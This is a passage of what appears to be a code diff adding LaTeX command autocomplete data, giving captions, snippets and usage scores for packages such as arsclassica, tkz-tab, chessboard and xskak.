'\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\titleformat{}{}{}{}{}[]', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}[$6]', + meta: 'arsclassica-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}[]{}{}{}{}', + snippet: '\\titleformat{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'arsclassica-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}', + snippet: '\\titleformat{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}{}{}{}', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}', + meta: 'arsclassica-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titlespacing{}{}{}{}', + snippet: '\\titlespacing{$1}{$2}{$3}{$4}', + meta: 'arsclassica-cmd', + score: 0.023062744385192156, + }, + { + caption: '\\markboth{}{}', + snippet: '\\markboth{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markboth{}', + snippet: '\\markboth{$1}', + meta: 'arsclassica-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markright{}', + snippet: '\\markright{$1}', + meta: 'arsclassica-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\markright{}{}', + snippet: '\\markright{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\filleft', + snippet: '\\filleft', + meta: 'arsclassica-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\filcenter', + snippet: '\\filcenter', + meta: 'arsclassica-cmd', + score: 0.0004835660211260246, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'arsclassica-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\cleardoublepage', + snippet: '\\cleardoublepage', + meta: 'arsclassica-cmd', + score: 0.044016804142963585, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'arsclassica-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\chaptertitlename', + snippet: '\\chaptertitlename', + meta: 'arsclassica-cmd', + score: 0.0016985007766926272, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'arsclassica-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\filright', + snippet: '\\filright', + meta: 'arsclassica-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\titlerule', + snippet: '\\titlerule', + meta: 'arsclassica-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\titlerule[]{}', + snippet: '\\titlerule[$1]{$2}', + meta: 'arsclassica-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'arsclassica-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'arsclassica-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'arsclassica-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'arsclassica-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'arsclassica-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'arsclassica-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'arsclassica-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'arsclassica-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'arsclassica-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'arsclassica-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\marginpar{}', + snippet: '\\marginpar{$1}', + meta: 'arsclassica-cmd', + score: 0.003400158497921723, + }, + { + caption: '\\marginpar', + snippet: '\\marginpar', + meta: 'arsclassica-cmd', + score: 0.003400158497921723, + }, + { + caption: '\\cftsecleader', + snippet: '\\cftsecleader', + meta: 'arsclassica-cmd', + score: 0.0011340882025681251, + }, + { + caption: '\\cftsubsecleader', + snippet: '\\cftsubsecleader', + meta: 'arsclassica-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\spacedlowsmallcaps{}', + snippet: '\\spacedlowsmallcaps{$1}', + meta: 'arsclassica-cmd', + score: 0.002677188251799468, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'arsclassica-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\chaptermark', + snippet: '\\chaptermark', + meta: 'arsclassica-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\chaptermark{}', + snippet: '\\chaptermark{$1}', + meta: 'arsclassica-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\part{}', + snippet: '\\part{$1}', + meta: 'arsclassica-cmd', + score: 0.022180129487444723, + }, + { + caption: '\\tocEntry{}', + snippet: '\\tocEntry{$1}', + meta: 'arsclassica-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\graffito{}', + snippet: '\\graffito{$1}', + meta: 'arsclassica-cmd', + score: 1.1006799670632527e-5, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'arsclassica-cmd', + score: 0.422097569591803, + }, + { + caption: '\\spacedallcaps{}', + snippet: '\\spacedallcaps{$1}', + meta: 'arsclassica-cmd', + score: 0.0015281000475958944, + }, + { + caption: '\\cftchapleader', + snippet: '\\cftchapleader', + meta: 'arsclassica-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\myVersion', + snippet: '\\myVersion', + meta: 'arsclassica-cmd', + score: 0.00018029288638573757, + }, + { + caption: '\\ctparttext{}', + snippet: '\\ctparttext{$1}', + meta: 'arsclassica-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'arsclassica-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'arsclassica-cmd', + score: 2.341195220791228, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'arsclassica-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'arsclassica-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'arsclassica-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'arsclassica-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'arsclassica-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'arsclassica-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'arsclassica-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'arsclassica-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\lsstyle', + snippet: '\\lsstyle', + meta: 'arsclassica-cmd', + score: 0.0023367519914345774, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'arsclassica-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\DisableLigatures[]{}', + snippet: '\\DisableLigatures[$1]{$2}', + meta: 'arsclassica-cmd', + score: 0.0009805246614299932, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'arsclassica-cmd', + score: 0.00021116765384691477, + }, + ], + blkarray: [ + { + caption: '\\small', + snippet: '\\small', + meta: 'blkarray-cmd', + score: 0.2447632045426295, + }, + { + caption: '\\small{}', + snippet: '\\small{$1}', + meta: 'blkarray-cmd', + score: 0.2447632045426295, + }, + ], + 'tkz-tab': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-tab-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-tab-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tkz-tab-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tkz-tab-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tkz-tab-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-tab-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tkz-tab-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-tab-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tkz-tab-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tkz-tab-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'tkz-tab-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'tkz-tab-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tkz-tab-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'tkz-tab-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-tab-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'tkz-tab-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'tkz-tab-cmd', + score: 0.00031058155311734754, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-tab-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tkz-tab-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-tab-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-tab-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tkz-tab-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-tab-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tkz-tab-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-tab-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tkz-tab-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tkz-tab-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tkz-tab-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tkz-tab-cmd', + score: 0.2864294797053033, + }, + ], + todo: [ + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'todo-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'todo-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'todo-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'todo-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: '\\Bbb{$1}', + meta: 'todo-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'todo-cmd', + score: 0.0006671850995492977, + }, + ], + lcg: [ + { + caption: '\\rand', + snippet: '\\rand', + meta: 'lcg-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'lcg-cmd', + score: 0.00037306820619479756, + }, + ], + kantlipsum: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'kantlipsum-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'kantlipsum-cmd', + score: 0.2864294797053033, + }, + ], + chappg: [ + { + caption: '\\pagenumbering{}', + snippet: '\\pagenumbering{$1}', + meta: 'chappg-cmd', + score: 0.06731737633021802, + }, + ], + chessboard: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'chessboard-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'chessboard-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboardfontencoding{}', + snippet: '\\setboardfontencoding{$1}', + meta: 'chessboard-cmd', + score: 0.00014668111964632249, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'chessboard-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chessboard-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chessboard-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chessboard-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chessboard-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chessboard-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chessboard-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chessboard-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chessboard-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'chessboard-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'chessboard-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chessboard-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'chessboard-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chessboard-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chessboard-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chessboard-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'chessboard-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'chessboard-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'chessboard-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\green', + snippet: '\\green', + meta: 'chessboard-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'chessboard-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'chessboard-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'chessboard-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'chessboard-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'chessboard-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'chessboard-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'chessboard-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'chessboard-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'chessboard-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'chessboard-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chessboard-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chessboard-cmd', + score: 0.008565354665444157, + }, + ], + xskak: [ + { + caption: '\\mainline{}', + snippet: '\\mainline{$1}', + meta: 'xskak-cmd', + score: 0.0010267678375242572, + }, + { + caption: '\\newchessgame', + snippet: '\\newchessgame', + meta: 'xskak-cmd', + score: 0.000880086717877935, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'xskak-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'xskak-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'xskak-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboardfontencoding{}', + snippet: '\\setboardfontencoding{$1}', + meta: 'xskak-cmd', + score: 0.00014668111964632249, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'xskak-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'xskak-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'xskak-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'xskak-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xskak-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'xskak-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xskak-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'xskak-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'xskak-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'xskak-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'xskak-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'xskak-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'xskak-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xskak-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'xskak-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'xskak-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xskak-cmd', + score: 